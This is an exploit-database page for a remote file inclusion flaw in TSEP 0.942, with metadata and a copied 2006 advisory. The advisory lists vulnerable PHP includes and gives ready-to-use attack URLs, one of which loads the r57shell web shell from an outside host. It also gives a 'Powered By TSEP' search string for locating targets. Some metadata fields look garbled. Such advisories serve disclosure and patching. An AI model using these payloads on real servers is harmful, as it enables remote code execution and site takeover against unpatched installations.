TSEP <= 0.942 Remote File Include

CVE	Category	Price	Severity
CVE-2004-1246	CWE-Other	Not specified	High

Author	Risk	Exploitation Type	Date
Asokan R	High	Remote	2006-08-15

CPE	PURL
cpe:cpe:/a:exploitalert:tsep:0.942	pkg:pkg:exploitalert/[email protected]

CVSS	EPSS	EPSSP
CVSS:5.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N	0.942	0

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080063

Below is a copy:

Script: TSEP <= 0.942
URL:  www.tsep.info
Discovered: beford <xbefordx gmail com>
Comments: "register_globals" must be enabled duh.
document.this != http://www.milw0rm.com/exploits/2098
Vulnerable Files/Code:

./tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://rst.void
.ru/download/r57shell.txt?
./tsep.0942/include/printpagedetails.php => require_once(
$tsep_config["absPath"]."/include/convert_htmlent.php" );
./tsep.0942/include/ipfunctions.php => require_once(
$tsep_config["absPath"]."/include/IPv6.php" );
./tsep.0942/include/contentimages.class.php => require_once(
$tsep_config["absPath"]."/include/contentimages.class.php" );
./tsep.0942/include/configfunctions.php => require_once(
$tsep_config["absPath"]."/include/mmexfunctions.php" );
./tsep.0942/include/log.class.php => require_once(
$tsep_config["absPath"]."/include/tseptrace.php" );

Not-leet-enough: "Powered By TSEP"

POC:
http://hax.com/tsep/include/colorswitch.php?tsep_config[absPath]=http://
remotefile/?

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum